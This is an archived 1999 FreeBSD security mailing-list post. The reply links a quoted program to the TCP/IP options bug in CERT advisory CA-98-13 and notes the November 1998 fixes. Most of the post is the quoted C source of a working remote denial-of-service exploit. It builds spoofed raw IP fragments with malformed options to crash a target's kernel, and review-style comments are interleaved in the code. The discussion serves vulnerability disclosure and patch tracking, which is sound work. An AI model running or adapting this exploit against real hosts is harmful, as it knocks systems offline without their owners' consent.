Date:      Mon, 10 May 1999 20:18:03 -0700
From:      Don Lewis <Don.Lewis@tsc.tdk.com>
To:        Darren Reed <avalon@coombs.anu.edu.au>, freebsd-security@FreeBSD.ORG
Subject:   Re: freebsd mbuf crash
Message-ID:  <199905110318.UAA26058@salsa.gv.tsc.tdk.com>
In-Reply-To: Darren Reed <avalon@coombs.anu.edu.au> "freebsd mbuf crash" (May  5,  1:26am)

I now suspect this is an exploit for the bug mentioned in CERT Advisory
CA-98-13-tcp-denial-of-service.  If so this bug was fixed for FreeBSD
3.0-CURRENT in revision 1.105 of ip_input.c, and revision 1.50.2.22
before 2.2.8-RELEASE.  Both fixes were committed on November 11, 1998.

This exploit's use of a large number of options in the IP header seems
to be the tipoff.


On May 5,  1:26am, Darren Reed wrote:
} Subject: freebsd mbuf crash
} 
} Is this one (below) taken care of?  Or perhaps a derivative of this?
} 
} darren
} 
} /* freebsd-mbuf-crash.c by Jeff Roberson, (jeffr@nwlink.com). Dec 11 1998. 
}  * I'm only releasing this as an example because the bug hardly ever reliably crashes a machine.
}  */
} 
} #include <stdio.h>
} #include <stdlib.h>
} #include <netinet/ip.h>
} #define __FAVOR_BSD
} #include <netinet/tcp.h>
} #include <netinet/in.h>
} #include <sys/socket.h>
} #include <arpa/inet.h>
} #include <netdb.h>
} #include <strings.h>
} 
} 
} /*
}  * htona -- resolve a dotted-quad string or host name to an IPv4 address
}  * in network byte order.  Tries inet_addr() first and falls back to
}  * gethostbyname().  Returns (u_long)-1 when neither lookup succeeds.
}  * NOTE(review): (u_long)-1 is the same bit pattern as INADDR_NONE
}  * (255.255.255.255), so a host that legitimately resolves to that
}  * address is indistinguishable from a lookup failure.
}  */
} u_long htona(char *host)
} {
}         u_long  addr;
}         struct  hostent *hp;
} 
}         if ((addr=inet_addr(host)) == INADDR_NONE) {
}                 if ((hp = gethostbyname(host)) == NULL)
}                         return(-1);
}                 /* NOTE(review): copies sizeof(u_long) bytes, but an IPv4
}                  * entry in h_addr_list[] is 4 bytes (hp->h_length).  On
}                  * LP64 platforms u_long is 8 bytes, so this over-reads the
}                  * hostent entry; the copy should be bounded by h_length. */
}                 bcopy(hp->h_addr_list[0], &addr, sizeof(addr));
}         }       
}         return(addr);
} }
} 
} /*
}  * main -- builds one hand-crafted IPv4/TCP datagram in a 128-byte stack
}  * buffer and writes it to a raw socket three times: the 124-byte first
}  * fragment twice (IP_MF set), then an 80-byte trailing fragment with
}  * fragment offset 8 and no flags.  The IP header is declared 60 bytes
}  * long (ip_hl = 15), i.e. 20 fixed bytes plus 40 bytes of options, which
}  * is why the TCP header is placed at buf + 60.  The cover message
}  * attributes the resulting kernel crash to the ip_input.c option-handling
}  * bug of CERT advisory CA-98-13, fixed in FreeBSD in November 1998.
}  *
}  * Arguments: argv[1] is the destination host; exits 1 on usage error,
}  * socket/sendto failure, or if the host cannot be resolved.
}  */
} int main(int argc, char* argv[])
} {
}         char    buf[128];
}         struct  ip *iph = (struct ip *)buf;     
}         /* options start right after the 20-byte fixed IP header */
}         u_char  *ipoptions = (u_char *)(buf + sizeof(struct ip));
}         struct  tcphdr *tcph = (struct tcphdr *)(buf + 60);
}         int     s, i;
}         /* NOTE(review): never zeroed -- only sin_family, sin_port and
}          * sin_addr are assigned below, so sin_len (BSD) and sin_zero hold
}          * whatever was on the stack.  A bzero(&sin, sizeof(sin)) belongs
}          * here. */
}         struct  sockaddr_in sin;
} 
}         if (argc != 2) {
}                 printf("usage\n\t%s <host>\n", argv[0]);
}                 exit(1);
}         }
}         /* raw socket with IPPROTO_RAW: the caller supplies the IP header */
}         s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
}         if (s < 0) {
}                 perror("socket");
}                 exit(1);
}         }
}         sin.sin_family = AF_INET;
}         sin.sin_port = htons(7);
}         sin.sin_addr.s_addr = htona(argv[1]);
}         /* htona() returns (u_long)-1 on failure; the comparison works
}          * because -1 converts to the all-ones s_addr value */
}         if (sin.sin_addr.s_addr == -1) {
}                 printf("Error resolving %s\n", argv[1]);
}                 exit(1);
}         }
} 
}         bzero(buf, sizeof(buf));
}         /* header length in 32-bit words: 15 * 4 = 60 bytes, the maximum */
}         iph->ip_hl=15;
}         iph->ip_v=4;
}         iph->ip_len=htons(124);
}         /* NOTE(review): getpid() is used without <unistd.h> being included
}          * above, so this relies on an implicit declaration */
}         iph->ip_id= htons(getpid());
}         /* "more fragments" flag set, offset 0 */
}         iph->ip_off= htons(IP_MF);
}         iph->ip_ttl = 255;
}         iph->ip_p = IPPROTO_TCP;
}         /* NOTE(review): copies sizeof(u_long) bytes into a 4-byte
}          * struct in_addr; on LP64 platforms that is 8 bytes and spills
}          * into the option bytes that follow (which are overwritten again
}          * below).  sizeof(iph->ip_dst) would be the correct length. */
}         bcopy(&sin.sin_addr.s_addr, &iph->ip_dst, sizeof(u_long));
}         iph->ip_src.s_addr = htona("10.2.3.4");
}         /* this loop is redundant: ipoptions[0..39] are all reassigned by
}          * the four statements that follow it */
}         for (i = 0; i < 20;i++) {
}                 ipoptions[i]=0xff;
}         }
}         ipoptions[0] = 0xff; /* Made up option */  
}         ipoptions[1] = 0x1a;
}         /* fills ipoptions[2..38]; NOTE(review): memset() needs <string.h>,
}          * only <strings.h> is included, so this is an implicit declaration */
}         memset((char *)&ipoptions[2], 0xff, 37);
}         ipoptions[39] = 1;  /* IP_NOP */
}         tcph->th_sport = htons(5505);
}         tcph->th_dport = htons(23);
}         tcph->th_seq = htonl(0xabcde123);
}         tcph->th_ack = htonl(0x321edcba);
}         tcph->th_flags = TH_ACK | TH_PUSH;
}         tcph->th_win = htons(0x1234);
} 
}         /* first fragment (124 bytes, IP_MF set), sent twice back to back */
}         if (sendto(s, buf, 124, 0, (struct sockaddr *)&sin, sizeof(struct sockaddr)) < 124) {
}                 perror("sendto");
}                 exit(1);
}         }
}         if (sendto(s, buf, 124, 0, (struct sockaddr *)&sin, sizeof(struct sockaddr)) < 124) {   
}                 perror("sendto");
}                 exit(1);
}         }
}         /* trailing fragment: 80 bytes total, fragment offset 8, flags clear */
}         iph->ip_len = htons(80);
}         iph->ip_off = htons(8);
}         /* NOTE(review): 80 bytes are sent but the check is against 60, so
}          * a short write of 60..79 bytes is silently accepted; the earlier
}          * sends compare against their full length and this one should
}          * compare against 80 for consistency */
}         if (sendto(s, buf, 80, 0, (struct sockaddr *)&sin, sizeof(struct sockaddr)) < 60) {
}                 perror("sendto");
}                 exit(1);
}         }
}         exit(0);
} }
} 
} 
} 
} To Unsubscribe: send mail to majordomo@FreeBSD.org
} with "unsubscribe freebsd-security" in the body of the message
}-- End of excerpt from Darren Reed







